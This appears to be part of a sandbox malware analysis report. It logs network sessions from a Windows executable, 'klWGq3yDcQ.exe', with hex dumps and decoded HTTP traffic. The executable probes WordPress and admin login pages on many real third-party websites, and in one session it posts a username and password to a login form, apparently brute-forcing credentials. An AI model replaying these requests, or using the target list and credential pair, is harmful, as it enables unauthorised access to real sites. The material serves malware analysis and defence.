                                                                                                                                                                                                    2023-11-26 05:59:44 UTC618INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 61 64 6d 69 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61 2d 37 63 39 63 34 34 36 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/adminServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a-7c9c446c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    434192.168.2.451203162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC177OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC417INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocation: https://


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    435192.168.2.45111545.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    436192.168.2.45130634.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC171OUTGET /en/admin HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC653INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 33 2e 36 33 31 31 30 33 35 34 32 35 34 30 32 36 31 32 38 35 36 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978383.6311035425402612856Cache-Control: public,max-age=0,must-revalidateServer:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC599INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1252INData Raw: 20 2f 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 74 79 6c 65 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 6c 61 6e 67 3d 22 65 6e 22 20 6e 67 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3d 22 45 72 72 6f 72 50 61 67 65 43 6f 6e 74 72 6f 6c 6c 65 72 20 61 73 20 65 72 72 6f 72 50 61 67 65 43 74 72 6c 22 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 70 61 67 65 2d 61 70 70 22 20 6e 67 2d 63 6c 61 73 73 3d 22 7b
                                                                                                                                                                                                    Data Ascii: /> ... --> <link rel="stylesheet" href="//static.parastorage.com/services/wix-public/1.719.0/styles/error-pages/styles.css"> ... --></head><body lang="en" ng-controller="ErrorPageController as errorPageCtrl" class="error-page-app" ng-class="{
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1014INData Raw: 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 62 61 73 65 44 6f 6d 61 69 6e 27 2c 20 27 77 69 78 2e 63 6f 6d 27 29 3b 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 6c 61 6e 67 75 61 67
                                                                                                                                                                                                    Data Ascii: <script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.719.0/'); angular.module('wixErrorPagesApp').constant('baseDomain', 'wix.com'); angular.module('wixErrorPagesApp').constant('languag


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    437192.168.2.451050194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC284OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: ff59ae34f86788aafc83adbd6fbb16ab=573a080441b430e46540f849b8105044
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.maxiv.lu.se/
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC98INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 Foundcontent-length: 0location: /cache-control: no-cacheconnection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    438192.168.2.451330159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC174OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:44 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    439192.168.2.451070213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC395OUTPOST /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/wp/wp-login.php
                                                                                                                                                                                                    Content-Length: 140
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC140OUTData Raw: 6c 6f 67 3d 63 72 6f 6d 61 6e 32 37 33 26 70 77 64 3d 68 6f 6c 61 61 61 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 25 32 46 77 70 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=croman273&pwd=holaaaa&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fwww.ceuandalucia.es%2Fwp%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7437INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    440192.168.2.451276104.26.7.374436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC206OUTGET /domain_profile.cfm?d=robinsonland.com HTTP/1.1
                                                                                                                                                                                                    Host: www.hugedomains.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC794INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 73 69 74 65 5f 76 65 72 73 69 6f 6e 5f 70 68 61 73 65 3d 31 30 38 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 30 32 34 20 30 35 3a 35 39 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecache-control: privatevary: Accept-Encodingset-cookie: site_version_phase=108; expires=Wed, 20-Nov-2024 05:59:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC575INData Raw: 37 63 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65
                                                                                                                                                                                                    Data Ascii: 7c85<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
